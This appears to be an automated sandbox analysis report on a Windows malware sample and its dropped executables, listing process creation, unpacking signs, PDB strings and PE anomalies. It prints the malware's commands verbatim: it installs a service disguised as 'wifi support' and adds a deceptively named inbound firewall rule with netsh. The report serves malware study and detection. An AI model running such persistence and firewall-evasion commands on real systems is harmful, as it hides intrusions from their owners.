Source: unknown | Process created: C:\Users\user\Desktop\0Cjy7Lkv1A.exe "C:\Users\user\Desktop\0Cjy7Lkv1A.exe"
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Process created: C:\Users\user\Desktop\0Cjy7Lkv1A.exe "C:\Users\user\Desktop\0Cjy7Lkv1A.exe"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Users\user\AppData\Roaming\ujhcrda C:\Users\user\AppData\Roaming\ujhcrda
Source: C:\Users\user\AppData\Roaming\ujhcrda | Process created: C:\Users\user\AppData\Roaming\ujhcrda C:\Users\user\AppData\Roaming\ujhcrda
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\60C2.exe C:\Users\user\AppData\Local\Temp\60C2.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6188 -ip 6188
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\7063.exe C:\Users\user\AppData\Local\Temp\7063.exe
Source: C:\Users\user\AppData\Local\Temp\60C2.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 520
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\A8FB.exe C:\Users\user\AppData\Local\Temp\A8FB.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\B3BA.exe C:\Users\user\AppData\Local\Temp\B3BA.exe
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\uuqefjyt\
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\szdcdkt.exe" C:\Windows\SysWOW64\uuqefjyt\
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create uuqefjyt binPath= "C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d\"C:\Users\user\AppData\Local\Temp\A8FB.exe\"" type= own start= auto DisplayName= "wifi support
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\SysWOW64\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description uuqefjyt "wifi internet conection
Source: C:\Windows\SysWOW64\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start uuqefjyt
Source: C:\Windows\SysWOW64\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Source: unknown | Process created: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d"C:\Users\user\AppData\Local\Temp\A8FB.exe"
Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\AppData\Local\Temp\B3BA.exe | Process created: C:\Users\user\AppData\Local\Temp\B3BA.exe C:\Users\user\AppData\Local\Temp\B3BA.exe
Source: C:\Users\user\AppData\Local\Temp\B3BA.exe | Process created: C:\Users\user\AppData\Local\Temp\B3BA.exe C:\Users\user\AppData\Local\Temp\B3BA.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\1BCC.exe C:\Users\user\AppData\Local\Temp\1BCC.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\382E.exe C:\Users\user\AppData\Local\Temp\382E.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\ujhcrda C:\Users\user\AppData\Roaming\ujhcrda
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\5126.exe C:\Users\user\AppData\Local\Temp\5126.exe
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Process created: C:\Users\user\Desktop\0Cjy7Lkv1A.exe "C:\Users\user\Desktop\0Cjy7Lkv1A.exe"
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\60C2.exe C:\Users\user\AppData\Local\Temp\60C2.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\7063.exe C:\Users\user\AppData\Local\Temp\7063.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\A8FB.exe C:\Users\user\AppData\Local\Temp\A8FB.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\B3BA.exe C:\Users\user\AppData\Local\Temp\B3BA.exe
Source: C:\Users\user\AppData\Roaming\ujhcrda | Process created: C:\Users\user\AppData\Roaming\ujhcrda C:\Users\user\AppData\Roaming\ujhcrda
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6188 -ip 6188
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 520
Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\uuqefjyt\
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\szdcdkt.exe" C:\Windows\SysWOW64\uuqefjyt\
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create uuqefjyt binPath= "C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d\"C:\Users\user\AppData\Local\Temp\A8FB.exe\"" type= own start= auto DisplayName= "wifi support
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description uuqefjyt "wifi internet conection
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start uuqefjyt
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Source: C:\Users\user\AppData\Local\Temp\B3BA.exe | Process created: C:\Users\user\AppData\Local\Temp\B3BA.exe C:\Users\user\AppData\Local\Temp\B3BA.exe
Source: C:\Users\user\AppData\Local\Temp\B3BA.exe | Process created: C:\Users\user\AppData\Local\Temp\B3BA.exe C:\Users\user\AppData\Local\Temp\B3BA.exe
Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\60C2.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeCode function: 19_2_00406A60 lstrcatA,CreateFileA,GetDiskFreeSpaceA,GetLastError,CloseHandle,CloseHandle,FindCloseChangeNotification,GetLastError,CloseHandle,DeleteFileA,GetLastError,
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6188
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5432:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6112:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2968:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4820:120:WilError_01
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:5668:64:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1312:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5004:120:WilError_01
                          Source: B3BA.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: B3BA.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 20.0.B3BA.exe.370000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 20.0.B3BA.exe.370000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 20.0.B3BA.exe.370000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 20.0.B3BA.exe.370000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 20.0.B3BA.exe.370000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 20.0.B3BA.exe.370000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 20.2.B3BA.exe.370000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 20.2.B3BA.exe.370000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 20.0.B3BA.exe.370000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 20.0.B3BA.exe.370000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                          Source: 0Cjy7Lkv1A.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: profapi.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 60C2.exe, 0000000E.00000002.521453643.0000000000413000.00000002.00020000.sdmp, 60C2.exe, 0000000E.00000000.454922843.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000012.00000002.520151138.0000000004F70000.00000002.00020000.sdmp
                          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: shcore.pdb~Sihc source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.473871600.0000000004B27000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: sechost.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: powrprof.pdbxSohi source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: shcore.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: powrprof.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: C:\zoro\veme_81\vujiwoli76 gag\sipowatelunem36\locufiyazed.pdb source: 7063.exe, 00000011.00000000.468936962.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: advapi32.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: fltLib.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: shell32.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: fltLib.pdblS[ha source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: shlwapi.pdbrSUhr source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: TC:\sejuyupe34\tehajogim\xabed.pdb source: A8FB.exe, 00000013.00000000.474529040.0000000000413000.00000002.00020000.sdmp, A8FB.exe, 00000013.00000002.499568832.0000000000415000.00000002.00020000.sdmp, szdcdkt.exe, 00000024.00000002.510363795.0000000000415000.00000002.00020000.sdmp, szdcdkt.exe, 00000024.00000000.499129380.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: wimm32.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: sechost.pdbk source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: combase.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: C:\gebofa\95.pdb source: 0Cjy7Lkv1A.exe, 00000000.00000002.361830402.0000000000414000.00000002.00020000.sdmp, 0Cjy7Lkv1A.exe, 00000000.00000000.353857119.0000000000414000.00000002.00020000.sdmp, ujhcrda, 0000000C.00000000.448285897.0000000000414000.00000002.00020000.sdmp, ujhcrda, 0000000C.00000002.459349671.0000000000414000.00000002.00020000.sdmp, ujhcrda, 0000000D.00000000.455076610.0000000000414000.00000002.00020000.sdmp
                          Source: Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: C:\sejuyupe34\tehajogim\xabed.pdb source: A8FB.exe, 00000013.00000000.474529040.0000000000413000.00000002.00020000.sdmp, A8FB.exe, 00000013.00000002.499568832.0000000000415000.00000002.00020000.sdmp, szdcdkt.exe, 00000024.00000002.510363795.0000000000415000.00000002.00020000.sdmp, szdcdkt.exe, 00000024.00000000.499129380.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 60C2.exe, 0000000E.00000002.521453643.0000000000413000.00000002.00020000.sdmp, 60C2.exe, 0000000E.00000000.454922843.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000012.00000002.520151138.0000000004F70000.00000002.00020000.sdmp

                          Data Obfuscation:

                          Detected unpacking (overwrites its own PE header)
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeUnpacked PE file: 17.2.7063.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeUnpacked PE file: 19.2.A8FB.exe.400000.0.unpack
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeUnpacked PE file: 36.2.szdcdkt.exe.400000.0.unpack
                          Detected unpacking (changes PE section rights)
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeUnpacked PE file: 17.2.7063.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeUnpacked PE file: 19.2.A8FB.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeUnpacked PE file: 36.2.szdcdkt.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Yara detected BatToExe compiled binary
                          Source: Yara matchFile source: 00000031.00000003.584625653.0000000000A90000.00000004.00000040.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.584698549.00000000023D0000.00000004.00000040.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.584668471.0000000000A97000.00000004.00000040.sdmp, type: MEMORY
                          .NET source code contains method to dynamically call methods (often used by packers)
                          Source: B3BA.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 20.0.B3BA.exe.370000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 20.0.B3BA.exe.370000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 20.2.B3BA.exe.370000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 20.0.B3BA.exe.370000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 41.2.B3BA.exe.250000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 41.0.B3BA.exe.250000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 41.0.B3BA.exe.250000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 41.0.B3BA.exe.250000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 41.0.B3BA.exe.250000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_00403963 push ecx; ret
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_00413104 push eax; ret
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_00404D99 push ecx; ret
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_00453C66 push esi; ret
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_00453C01 push esi; ret
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_00463634 push es; iretd
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_2_00401880 push esi; iretd
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_2_00402E94 push es; iretd
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_1_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaCode function: 12_2_00523C66 push esi; ret
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaCode function: 12_2_00523C01 push esi; ret
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaCode function: 12_2_00533634 push es; iretd
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaCode function: 13_2_00401880 push esi; iretd
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaCode function: 13_2_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: 14_2_00412CA4 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: 14_2_0207123C push edi; iretd
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: 14_2_0207127E push edi; iretd
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: 14_2_0207735E push esp; iretd
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: 14_2_020753C8 pushfd ; retf
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_004139B0 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeCode function: 19_2_00533A79 push 0000002Bh; iretd
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeCode function: 19_2_00531283 push ds; ret
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 20_2_00378508 push 00000028h; retf 0000h
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 20_2_0037764A push esp; ret
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 20_2_00D84003 push esi; retf
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 20_2_04BC0D8C push E86DC443h; retf
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 41_2_00258508 push 00000028h; retf 0000h
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 41_2_0025764A push esp; ret
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 42_2_009B8508 push 00000028h; retf 0000h
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 42_2_009B764A push esp; ret
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 42_2_02D73C58 push esp; iretd
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_0040A7EE LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                          Source: 8B25.exe.5.drStatic PE information: 0xAB35ADD6 [Sat Jan 8 14:57:26 2061 UTC]
                          Source: 8B25.exe.5.drStatic PE information: section name: .didata
                          Source: 9874.exe.5.drStatic PE information: section name: .code
                          Source: 382E.exe.5.drStatic PE information: section name: .gizi
                          Source: 382E.exe.5.drStatic PE information: section name: .bur
                          Source: 382E.exe.5.drStatic PE information: section name: .wob
                          Source: 5126.exe.5.drStatic PE information: section name: .code
                          Source: 6674.exe.5.drStatic PE information: section name:
                          Source: 6674.exe.5.drStatic PE information: section name:
                          Source: 6674.exe.5.drStatic PE information: section name:
                          Source: 6674.exe.5.drStatic PE information: section name:
                          Source: 6674.exe.5.drStatic PE information: section name:
                          Source: 6674.exe.5.drStatic PE information: section name:
                          Source: 6674.exe.5.drStatic PE information: section name: .T3QbYgM
                          Source: 6674.exe.5.drStatic PE information: section name: .adata
                          Source: initial sampleStatic PE information: section where entry point is pointing to: .didata
                          Source: 5126.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x5e577
                          Source: 6674.exe.5.drStatic PE information: real checksum: 0x361362 should be: 0x3775f1
                          Source: 9874.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x60613
